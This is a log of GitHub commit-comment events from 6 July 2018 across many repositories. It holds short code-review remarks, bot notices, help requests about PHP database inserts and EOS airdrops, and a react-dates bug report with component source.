{"id":"7927094308","type":"CommitCommentEvent","actor":{"login":"w1th0utnam3"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29617111,"position":null,"line":null,"path":null,"commit_id":"1cf6086d933ca93f4a36be44b6321fd300f3757f","created_at":"2018-07-06T06:32:38Z","updated_at":"2018-07-06T06:32:38Z","author_association":"OWNER","body":"Even if you exclude cross element, it might only work with FFCx because I extract the `tabulate_tensor` method by matching signature strings which might depend on the current signature in FFCx.\n\nBut I think FFCx still installs as fenics-ffc right?"}},"created_at":"2018-07-06T06:32:38Z"}
{"id":"7927103269","type":"CommitCommentEvent","actor":{"login":"w1th0utnam3"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29617131,"position":null,"line":null,"path":null,"commit_id":"1cf6086d933ca93f4a36be44b6321fd300f3757f","created_at":"2018-07-06T06:35:29Z","updated_at":"2018-07-06T06:35:29Z","author_association":"OWNER","body":"Ah, latest FFC still works with C++ code right? So it probably won't work because the names are different."}},"created_at":"2018-07-06T06:35:29Z"}
{"id":"7927107557","type":"CommitCommentEvent","actor":{"login":"Suarte-Jr"},"repo":{"name":"glaucia86/projeto.crud.php"},"payload":{"comment":{"id":29617144,"position":null,"line":null,"path":null,"commit_id":"4de10cd729d6893e182c9d5155cb350331e79cef","created_at":"2018-07-06T06:36:46Z","updated_at":"2018-07-06T06:36:46Z","author_association":"NONE","body":"//Inserindo no Banco:\r\n        if($validacao)\r\n        {\r\n            $pdo = Banco::conectar();\r\n            $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\r\n            $sql = \"INSERT INTO pessoa (nome, endereco, telefone, email, sexo) VALUES(?,?,?,?,?)\";\r\n            $q = $pdo->prepare($sql);\r\n            $q->execute(array($nome,$endereco,$telefone,$email,$sexo));\r\n            Banco::desconectar();\r\n            header(\"Location: index.php\");\r\n\r\npeco ajuda o codigo nao inser nada na base de dados so limpa as textbox"}},"created_at":"2018-07-06T06:36:46Z"}
{"id":"7927108089","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29617146,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T06:36:55Z","updated_at":"2018-07-06T06:36:55Z","author_association":"NONE","body":"\n        \n             \n             \n        \n            初始账号是指创世快照的那个账号吗？创世快照那个账号接受了好多空投，譬如EOSDAC，如果把EOSDAC转到其他账号也是按照这个操作吗？可以图片给我演示一遍吗？麻烦了\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\n            On 07/06/2018 13:06, wsdfz wrote: 选中要接受空投的帐号，必须是 初始帐号，然后在 交易 里面，点 EVR空投，再点 确定 即可。\n\n—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/EOSVR/EOSVR\",\"title\":\"EOSVR/EOSVR\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/header.png\",\"avatar_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/avatar.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/EOSVR/EOSVR\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@wsdfz on b624c8a: 选中要接受空投的帐号，必须是 初始帐号，然后在 交易 里面，点 EVR空投，再点 确定 即可。\\r\\n\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29616596\"}}}\n[\n{\n\"@context\": \"http://schema.org\",\n\"@type\": \"EmailMessage\",\n\"potentialAction\": {\n\"@type\": \"ViewAction\",\n\"target\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29616596\",\n\"url\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29616596\",\n\"name\": \"View Commit\"\n},\n\"description\": \"View this Commit on GitHub\",\n\"publisher\": {\n\"@type\": \"Organization\",\n\"name\": \"GitHub\",\n\"url\": \"https://github.com\"\n}\n}\n]"}},"created_at":"2018-07-06T06:36:55Z"}
{"id":"7927109202","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pygypsy-feedstock"},"payload":{"comment":{"id":29617151,"position":null,"line":null,"path":null,"commit_id":"2bf53b308f7287f779e0b7828db170b41072614f","created_at":"2018-07-06T06:37:15Z","updated_at":"2018-07-06T06:37:15Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @whyvez, @kayakwest, @jo-tham were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @whyvez, @kayakwest, @jo-tham were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T06:37:15Z"}
{"id":"7927113305","type":"CommitCommentEvent","actor":{"login":"rukawartjxodnd"},"repo":{"name":"rukawartjxodnd/first-pr"},"payload":{"comment":{"id":29617163,"position":4,"line":39,"path":"index.html","commit_id":"54d31c169b6daca5eccc3a4998d43a977deeecec","created_at":"2018-07-06T06:38:30Z","updated_at":"2018-07-06T06:38:30Z","author_association":"OWNER","body":"pull request 실습. 감사합니다~!"}},"created_at":"2018-07-06T06:38:30Z"}
{"id":"7927116526","type":"CommitCommentEvent","actor":{"login":"StephanOsthold"},"repo":{"name":"modell-aachen/SolrPlugin"},"payload":{"comment":{"id":29617167,"position":6,"line":18,"path":"lib/Foswiki/Plugins/SolrPlugin/Config.spec","commit_id":"11fbbc7daa9016ed3cf81658e0fef1d495e0e9a4","created_at":"2018-07-06T06:39:26Z","updated_at":"2018-07-06T06:39:26Z","author_association":"COLLABORATOR","body":"...must _be_ given...\r\n\r\nAber ich hoffe, dass wir das bald fixen werden, von daher ist mir das egal."}},"created_at":"2018-07-06T06:39:26Z"}
{"id":"7927118934","type":"CommitCommentEvent","actor":{"login":"HuYanChang"},"repo":{"name":"HuYanChang/study"},"payload":{"comment":{"id":29617171,"position":null,"line":null,"path":null,"commit_id":"a2d452d510306ca73168a4b3279fa3fc42882f38","created_at":"2018-07-06T06:40:11Z","updated_at":"2018-07-06T06:40:11Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-06T06:40:11Z"}
{"id":"7927119332","type":"CommitCommentEvent","actor":{"login":"HuYanChang"},"repo":{"name":"HuYanChang/study"},"payload":{"comment":{"id":29617173,"position":null,"line":null,"path":null,"commit_id":"a2d452d510306ca73168a4b3279fa3fc42882f38","created_at":"2018-07-06T06:40:17Z","updated_at":"2018-07-06T06:40:17Z","author_association":"OWNER","body":"22"}},"created_at":"2018-07-06T06:40:17Z"}
{"id":"7927122075","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29617179,"position":null,"line":null,"path":null,"commit_id":"2f89775fc268011e177097626463868ea69c7927","created_at":"2018-07-06T06:41:05Z","updated_at":"2018-07-06T06:41:05Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/76/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/76//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2f89775fc268011e177097626463868ea69c7927/76/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2f89775fc268011e177097626463868ea69c7927/76/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2f89775fc268011e177097626463868ea69c7927/76/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2f89775fc268011e177097626463868ea69c7927/76/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-06T06:41:05Z"}
{"id":"7927124179","type":"CommitCommentEvent","actor":{"login":"xyj435343328"},"repo":{"name":"BJ1802/bbs"},"payload":{"comment":{"id":29617193,"position":11,"line":38,"path":"post/views.py","commit_id":"257a5390376e30f06523767dcbd66bcf3e06c1ae","created_at":"2018-07-06T06:41:42Z","updated_at":"2018-07-06T06:41:42Z","author_association":"NONE","body":"123"}},"created_at":"2018-07-06T06:41:42Z"}
{"id":"7927137064","type":"CommitCommentEvent","actor":{"login":"kielze"},"repo":{"name":"chionyan/awesome_events"},"payload":{"comment":{"id":29617208,"position":5,"line":8,"path":"spec/requests/events_spec.rb","commit_id":"d16059b5ad736f2d8753cc9002ca2fabd21f22be","created_at":"2018-07-06T06:45:34Z","updated_at":"2018-07-06T06:45:34Z","author_association":"COLLABORATOR","body":"上の `before` で呼んでるから大丈夫そうやね！"}},"created_at":"2018-07-06T06:45:34Z"}
{"id":"7927142677","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617220,"position":3,"line":3,"path":"ding_language.install","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T06:47:18Z","updated_at":"2018-07-06T06:47:18Z","author_association":"NONE","body":"What about `_uninstall()`?"}},"created_at":"2018-07-06T06:47:18Z"}
{"id":"7927144151","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617222,"position":7,"line":7,"path":"ding_language.install","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T06:47:47Z","updated_at":"2018-07-06T06:47:47Z","author_association":"NONE","body":"What will happen when features are reverted, after this function has run?"}},"created_at":"2018-07-06T06:47:47Z"}
{"id":"7927145430","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29617225,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T06:48:10Z","updated_at":"2018-07-06T06:48:10Z","author_association":"NONE","body":"我差传感器基带相机NFC。。。\r\n\r\nJerryTsang <notifications@github.com> 于 2018年7月6日周五 下午1:39写道：\r\n\r\n> 最近想整，有时间的话\r\n>\r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/JerryTsang/android_kernel_sharp_msm8974/commit/c2ba89c6b256cc21ae077888e3248121a5789cb3#commitcomment-29616734>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AOQwEnDtdcm8ZAy3RMTcHQJo1NcBemZMks5uDvgrgaJpZM4VDPyB>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-06T06:48:10Z"}
{"id":"7927145758","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617227,"position":15,"line":15,"path":"ding_language.module","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T06:48:16Z","updated_at":"2018-07-06T06:48:16Z","author_association":"NONE","body":"This should apply to all views, not only some."}},"created_at":"2018-07-06T06:48:16Z"}
{"id":"7927147827","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617239,"position":35,"line":35,"path":"ding_language.module","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T06:48:52Z","updated_at":"2018-07-06T06:48:52Z","author_association":"NONE","body":"`ding_language_query_library_list_alter` -> `ding_language_query_language_alter`"}},"created_at":"2018-07-06T06:48:52Z"}
{"id":"7927150670","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617243,"position":7,"line":7,"path":"ding_language.install","commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T06:49:41Z","updated_at":"2018-07-06T06:49:41Z","author_association":"NONE","body":"Oh, nvm I noticed `ding_language_post_features_revert()`."}},"created_at":"2018-07-06T06:49:41Z"}
{"id":"7927151250","type":"CommitCommentEvent","actor":{"login":"ImaginationWork"},"repo":{"name":"ImaginationWork/TeamTalk"},"payload":{"comment":{"id":29617246,"position":null,"line":null,"path":null,"commit_id":"2e8b738c39e50314c5da4d4f60484886bccddca2","created_at":"2018-07-06T06:49:52Z","updated_at":"2018-07-06T06:49:52Z","author_association":"OWNER","body":"commit 信息写错，应该是 #11 "}},"created_at":"2018-07-06T06:49:52Z"}
{"id":"7927153580","type":"CommitCommentEvent","actor":{"login":"XzxEmbedded"},"repo":{"name":"Canaan-Creative/cgminer"},"payload":{"comment":{"id":29617247,"position":null,"line":null,"path":null,"commit_id":"ad49bfb047abf732db4761df6fe22cc761168cd9","created_at":"2018-07-06T06:50:32Z","updated_at":"2018-07-06T06:50:32Z","author_association":"NONE","body":"![851](https://user-images.githubusercontent.com/31298114/42363849-a49758c0-812b-11e8-80b1-067b9e6ee853.png)\r\nThis have been avalon851 version, so don't need if statement. Thanks."}},"created_at":"2018-07-06T06:50:32Z"}
{"id":"7927156869","type":"CommitCommentEvent","actor":{"login":"vincentchabannes"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29617257,"position":9,"line":186,"path":"contrib/ginac/ginac/CMakeLists.txt","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-06T06:51:29Z","updated_at":"2018-07-06T06:51:29Z","author_association":"MEMBER","body":"Indeed, and some others infos are not correct. I will update this page"}},"created_at":"2018-07-06T06:51:29Z"}
{"id":"7927157138","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29617258,"position":26,"line":54,"path":"website/src/docs/webcam.md","commit_id":"c2341f93a537b2671c2948b9804a523d7b258d45","created_at":"2018-07-06T06:51:33Z","updated_at":"2018-07-06T06:51:33Z","author_association":"MEMBER","body":"Here we refer to the Webcam Plugin and not the physical webcam so I think this was correct before @ajvanloon"}},"created_at":"2018-07-06T06:51:33Z"}
{"id":"7927159895","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29617259,"position":41,"line":81,"path":"website/src/docs/webcam.md","commit_id":"c2341f93a537b2671c2948b9804a523d7b258d45","created_at":"2018-07-06T06:52:19Z","updated_at":"2018-07-06T06:52:19Z","author_association":"MEMBER","body":"_the_ preview image"}},"created_at":"2018-07-06T06:52:19Z"}
{"id":"7927164374","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/jhipster-core"},"payload":{"comment":{"id":29617263,"position":6,"line":69,"path":"package.json","commit_id":"9f9c4c19d19cee3c5f9ceca7780536da439eef4b","created_at":"2018-07-06T06:53:34Z","updated_at":"2018-07-06T06:53:34Z","author_association":"MEMBER","body":"Yes and 6 will be eol in April next year anyway. Since the main dependent\nis JHipster which only support current LTS\n\nOn Fri, 6 Jul 2018, 8:24 am Mathieu ABOU-AICHI, <notifications@github.com>\nwrote:\n\n> Node 6 isn't the current LTS version\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jhipster/jhipster-core/commit/9f9c4c19d19cee3c5f9ceca7780536da439eef4b#commitcomment-29617049>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDlF7-oR56Z6qNWMObErbV8JbG7U0jEks5uDwKKgaJpZM4VEuok>\n> .\n>\n"}},"created_at":"2018-07-06T06:53:34Z"}
{"id":"7927171295","type":"CommitCommentEvent","actor":{"login":"haraldschilly"},"repo":{"name":"sagemathinc/cocalc"},"payload":{"comment":{"id":29617274,"position":19,"line":29,"path":"src/smc-webapp/frame-editors/pdf-editor/actions.ts","commit_id":"25eb02614425c9271da5eb4d479fe800f2d5dd31","created_at":"2018-07-06T06:55:22Z","updated_at":"2018-07-06T06:55:22Z","author_association":"CONTRIBUTOR","body":"removed line in 79e1cb6"}},"created_at":"2018-07-06T06:55:22Z"}
{"id":"7927176863","type":"CommitCommentEvent","actor":{"login":"mmotiy"},"repo":{"name":"mmotiy/coinbigapi"},"payload":{"comment":{"id":29617282,"position":null,"line":null,"path":null,"commit_id":"b1f1b31edd57305f8511b33c3d23846fa9f97b04","created_at":"2018-07-06T06:56:53Z","updated_at":"2018-07-06T06:56:53Z","author_association":"OWNER","body":"之前不是有个哈哈的吗？去哪里了"}},"created_at":"2018-07-06T06:56:53Z"}
{"id":"7927177952","type":"CommitCommentEvent","actor":{"login":"SegfredB"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29617284,"position":null,"line":null,"path":null,"commit_id":"332aef2dcc5bb8a65be808f2a222ef01419cd223","created_at":"2018-07-06T06:57:11Z","updated_at":"2018-07-06T06:57:11Z","author_association":"NONE","body":"hi.i dont know how to get it inside my wallet either."}},"created_at":"2018-07-06T06:57:11Z"}
{"id":"7927179104","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding_language"},"payload":{"comment":{"id":29617288,"position":null,"line":null,"path":null,"commit_id":"7ac7f03bdbf621a3388e6829a6c6401022600693","created_at":"2018-07-06T06:57:31Z","updated_at":"2018-07-06T06:57:31Z","author_association":"NONE","body":"What about the strongarms in `modules/ding_frontend/ding_frontend.strongarm.inc` - what will happen with those after revert? For example `languageicons_path`, `language_count`, `language_default`, `language_negotiation_language`, etc?"}},"created_at":"2018-07-06T06:57:31Z"}
{"id":"7927179683","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29617289,"position":null,"line":null,"path":null,"commit_id":"c0838ddfc049a47f302c6275f85fb38daae073a4","created_at":"2018-07-06T06:57:41Z","updated_at":"2018-07-06T06:57:41Z","author_association":"MEMBER","body":"@fichtner yes, this looks sane, same as the others https://github.com/opnsense/core/blob/d3f51dedb04d12cb998c7405435755139f45ff6b/src/opnsense/mvc/app/models/OPNsense/Base/FieldTypes/OptionField.php#L117-L120 "}},"created_at":"2018-07-06T06:57:41Z"}
{"id":"7927179929","type":"CommitCommentEvent","actor":{"login":"dicer3"},"repo":{"name":"airbnb/react-dates"},"payload":{"comment":{"id":29617290,"position":null,"line":null,"path":null,"commit_id":"453face2df9ac8542f30e2a6afc92d8ee6f54801","created_at":"2018-07-06T06:57:45Z","updated_at":"2018-07-06T06:57:45Z","author_association":"NONE","body":"i am getting the same error again\r\nOutsideClickHandler.js?701b:206 Uncaught TypeError: Cannot read property 'contains' of null\r\n    at OutsideClickHandler.onOutsideClick (OutsideClickHandler.js?701b:206)\r\n    at eval (TargetEventHandlers.js?5b7c:61)\r\n    at Array.forEach (<anonymous>)\r\n    at TargetEventHandlers.handleEvent (TargetEventHandlers.js?5b7c:55)\r\n`import React from 'react';\r\nimport PropTypes from 'prop-types';\r\n\r\n// import { forbidExtraProps } from 'airbnb-prop-types'; // TODO: add to propTypes; semver-major\r\nimport { addEventListener, removeEventListener } from 'consolidated-events';\r\n\r\nconst propTypes = {\r\n  children: PropTypes.node,\r\n  onOutsideClick: PropTypes.func,\r\n};\r\n\r\nconst defaultProps = {\r\n  children: <span />,\r\n  onOutsideClick() {},\r\n};\r\n\r\nexport default class OutsideClickHandler extends React.Component {\r\n  constructor(...args) {\r\n    super(...args);\r\n\r\n    this.onOutsideClick = this.onOutsideClick.bind(this);\r\n    this.setChildNodeRef = this.setChildNodeRef.bind(this);\r\n  }\r\n\r\n  componentDidMount() {\r\n    // `capture` flag is set to true so that a `stopPropagation` in the children\r\n    // will not prevent all outside click handlers from firing - maja\r\n    this.clickHandle = addEventListener(\r\n      document,\r\n      'click',\r\n      this.onOutsideClick,\r\n      { capture: true },\r\n    );\r\n  }\r\n\r\n  componentWillUnmount() {\r\n    if (this.clickHandle) { removeEventListener(this.clickHandle); }\r\n  }\r\n\r\n  onOutsideClick(e) {\r\n   // const isDescendantOfRoot = this.childNode.contains(e.target);\r\n   const { onOutsideClick } = this.props;\r\n    const { childNode } = this;\r\n    const isDescendantOfRoot = childNode && childNode.contains(e.target);\r\n    if (!isDescendantOfRoot) {\r\n     // this.props.onOutsideClick(e);\r\n     onOutsideClick(e);\r\n    }\r\n  }\r\n\r\n  setChildNodeRef(ref) {\r\n    this.childNode = ref;\r\n  }\r\n\r\n  render() {\r\n    return (\r\n      <div ref={this.setChildNodeRef}>\r\n        {this.props.children}\r\n      </div>\r\n    );\r\n  }\r\n}\r\n\r\nOutsideClickHandler.propTypes = propTypes;\r\nOutsideClickHandler.defaultProps = defaultProps;`\r\nversion 12.5.0\r\n\r\n\r\n"}},"created_at":"2018-07-06T06:57:45Z"}
{"id":"7927180659","type":"CommitCommentEvent","actor":{"login":"circl-lastname"},"repo":{"name":"TitanEmbeds/Titan"},"payload":{"comment":{"id":29617292,"position":null,"line":null,"path":null,"commit_id":"ded99e1495db74045a0760bc2b6265c4a86a711a","created_at":"2018-07-06T06:57:57Z","updated_at":"2018-07-06T06:57:57Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-06T06:57:57Z"}
{"id":"7927183164","type":"CommitCommentEvent","actor":{"login":"snac2016"},"repo":{"name":"snac2016/detali62bot"},"payload":{"comment":{"id":29617297,"position":null,"line":null,"path":null,"commit_id":"3324eae26dd8285aa0db6b73951fb35f958e5355","created_at":"2018-07-06T06:58:39Z","updated_at":"2018-07-06T06:58:39Z","author_association":"OWNER","body":"/start"}},"created_at":"2018-07-06T06:58:39Z"}
{"id":"7927184374","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29617298,"position":null,"line":null,"path":null,"commit_id":"c0838ddfc049a47f302c6275f85fb38daae073a4","created_at":"2018-07-06T06:58:58Z","updated_at":"2018-07-06T06:58:58Z","author_association":"MEMBER","body":"hehe, great, thanks"}},"created_at":"2018-07-06T06:58:58Z"}
{"id":"7927185298","type":"CommitCommentEvent","actor":{"login":"wsdfz"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29617299,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-06T06:59:14Z","updated_at":"2018-07-06T06:59:14Z","author_association":"CONTRIBUTOR","body":"创世快照 一般是 g 或 h 开头的12位帐号。比如：guzdonzugmge 。\r\n\r\nEOSDAC 不清楚它的发币帐号，如果要转其他币需要把它们的发币帐号替换 eosio.token （即EOS的发币帐号） 即可。比如 EVR 的发币帐号是 eosvrtokenss \r\n"}},"created_at":"2018-07-06T06:59:14Z"}
{"id":"7927187844","type":"CommitCommentEvent","actor":{"login":"snac2016"},"repo":{"name":"snac2016/detali62bot"},"payload":{"comment":{"id":29617301,"position":null,"line":null,"path":null,"commit_id":"3324eae26dd8285aa0db6b73951fb35f958e5355","created_at":"2018-07-06T06:59:56Z","updated_at":"2018-07-06T06:59:56Z","author_association":"OWNER","body":"Добро времени суток!"}},"created_at":"2018-07-06T06:59:56Z"}
{"id":"7927191024","type":"CommitCommentEvent","actor":{"login":"seyijava"},"repo":{"name":"seyijava/DataLake-Architecture-Using-Hadoop-Ecosystem"},"payload":{"comment":{"id":29617323,"position":null,"line":null,"path":null,"commit_id":"30766f2e1833cfc1061fd6013206266996037ffb","created_at":"2018-07-06T07:00:43Z","updated_at":"2018-07-06T07:00:43Z","author_association":"OWNER","body":"**Data Lake Architecture Using Big Data & Hadoop Ecosystem (Hadoop,Kafka,Flume,Spark,Hive) For Digital Transformations Of An Enterprise.**\r\n\r\n![flume-08-1](https://user-images.githubusercontent.com/8078264/42364324-a522eff4-80f2-11e8-99c8-77eb84a1f5e5.png)\r\n"}},"created_at":"2018-07-06T07:00:43Z"}
{"id":"7927191721","type":"CommitCommentEvent","actor":{"login":"CizChenzhoU"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617324,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T07:00:53Z","updated_at":"2018-07-06T07:00:53Z","author_association":"NONE","body":"几百张无法生成吗？重复值、相似度调很高了也没有办法。"}},"created_at":"2018-07-06T07:00:53Z"}
{"id":"7927192657","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"LedgerHQ/ledger-live-desktop"},"payload":{"comment":{"id":29617329,"position":null,"line":null,"path":null,"commit_id":"fbefd8f844320ff21f470035a8915257cd674208","created_at":"2018-07-06T07:01:07Z","updated_at":"2018-07-06T07:01:07Z","author_association":"MEMBER","body":"is this really what we want?"}},"created_at":"2018-07-06T07:01:07Z"}
{"id":"7927193369","type":"CommitCommentEvent","actor":{"login":"snac2016"},"repo":{"name":"snac2016/detali62bot"},"payload":{"comment":{"id":29617330,"position":2,"line":2,"path":"README.md","commit_id":"3324eae26dd8285aa0db6b73951fb35f958e5355","created_at":"2018-07-06T07:01:17Z","updated_at":"2018-07-06T07:01:17Z","author_association":"OWNER","body":"# 4"}},"created_at":"2018-07-06T07:01:17Z"}
{"id":"7927193827","type":"CommitCommentEvent","actor":{"login":"layershifter"},"repo":{"name":"stardust-ui/stardust"},"payload":{"comment":{"id":29617331,"position":12,"line":29,"path":"package.json","commit_id":"f4eb5e5b0b2c860edc0679b8e395e57d396f98fc","created_at":"2018-07-06T07:01:23Z","updated_at":"2018-07-06T07:01:23Z","author_association":"MEMBER","body":"We will never release under Windows 😸 "}},"created_at":"2018-07-06T07:01:23Z"}
{"id":"7927195402","type":"CommitCommentEvent","actor":{"login":"wmtransfercom"},"repo":{"name":"coinsbank/coinsbank-php-sdk"},"payload":{"comment":{"id":29617332,"position":null,"line":null,"path":null,"commit_id":"ff14116d9e6dc764e239108b0a2d2e6fb6ec2c36","created_at":"2018-07-06T07:01:48Z","updated_at":"2018-07-06T07:01:48Z","author_association":"NONE","body":"git@github.com:coinsbank/coinsbank-php-sdk.git"}},"created_at":"2018-07-06T07:01:48Z"}
{"id":"7927195644","type":"CommitCommentEvent","actor":{"login":"Rohland"},"repo":{"name":"codeo-za/segmenta"},"payload":{"comment":{"id":29617333,"position":35,"line":79,"path":"src/lib/segmenta.ts","commit_id":"71daccdae5cbde1fa061da03958f3b32d67a11e7","created_at":"2018-07-06T07:01:53Z","updated_at":"2018-07-06T07:01:53Z","author_association":"CONTRIBUTOR","body":"Dead code"}},"created_at":"2018-07-06T07:01:53Z"}
{"id":"7927197309","type":"CommitCommentEvent","actor":{"login":"snac2016"},"repo":{"name":"snac2016/detali62bot"},"payload":{"comment":{"id":29617334,"position":2,"line":2,"path":"README.md","commit_id":"3324eae26dd8285aa0db6b73951fb35f958e5355","created_at":"2018-07-06T07:02:20Z","updated_at":"2018-07-06T07:02:20Z","author_association":"OWNER","body":"Доброго времени суток!"}},"created_at":"2018-07-06T07:02:20Z"}
{"id":"7927198324","type":"CommitCommentEvent","actor":{"login":"seyijava"},"repo":{"name":"seyijava/DataLake-Architecture-Using-Hadoop-Ecosystem"},"payload":{"comment":{"id":29617336,"position":null,"line":null,"path":null,"commit_id":"30766f2e1833cfc1061fd6013206266996037ffb","created_at":"2018-07-06T07:02:36Z","updated_at":"2018-07-06T07:02:36Z","author_association":"OWNER","body":"[https://www.linkedin.com/post/edit/6417865288812896256](url)"}},"created_at":"2018-07-06T07:02:36Z"}
{"id":"7927204166","type":"CommitCommentEvent","actor":{"login":"Rominous"},"repo":{"name":"mika-nt28/Jeedom-Volets"},"payload":{"comment":{"id":29617345,"position":null,"line":null,"path":null,"commit_id":"6b0ee6a5417149f5d4af5d6b22240d47827d6ae4","created_at":"2018-07-06T07:04:10Z","updated_at":"2018-07-06T07:04:10Z","author_association":"NONE","body":"Bonjour Mika, je viens de voir cette modif, est-ce quelque chose en cours d'implémentation ou est-ce déjà en place ? Je ne trouve pas l'option dans le plugin ? Bonne journée"}},"created_at":"2018-07-06T07:04:10Z"}
{"id":"7927204475","type":"CommitCommentEvent","actor":{"login":"robzienert"},"repo":{"name":"spinnaker/orca"},"payload":{"comment":{"id":29617349,"position":49,"line":197,"path":"orca-web/src/main/groovy/com/netflix/spinnaker/orca/controllers/TaskController.groovy","commit_id":"a6acb3cc59c4b29a324a29c2900b67e6d6232d2d","created_at":"2018-07-06T07:04:15Z","updated_at":"2018-07-06T07:04:15Z","author_association":"MEMBER","body":"Can we get a followup PR to cleanup this endpoint, it shouldn't be in the codebase."}},"created_at":"2018-07-06T07:04:15Z"}
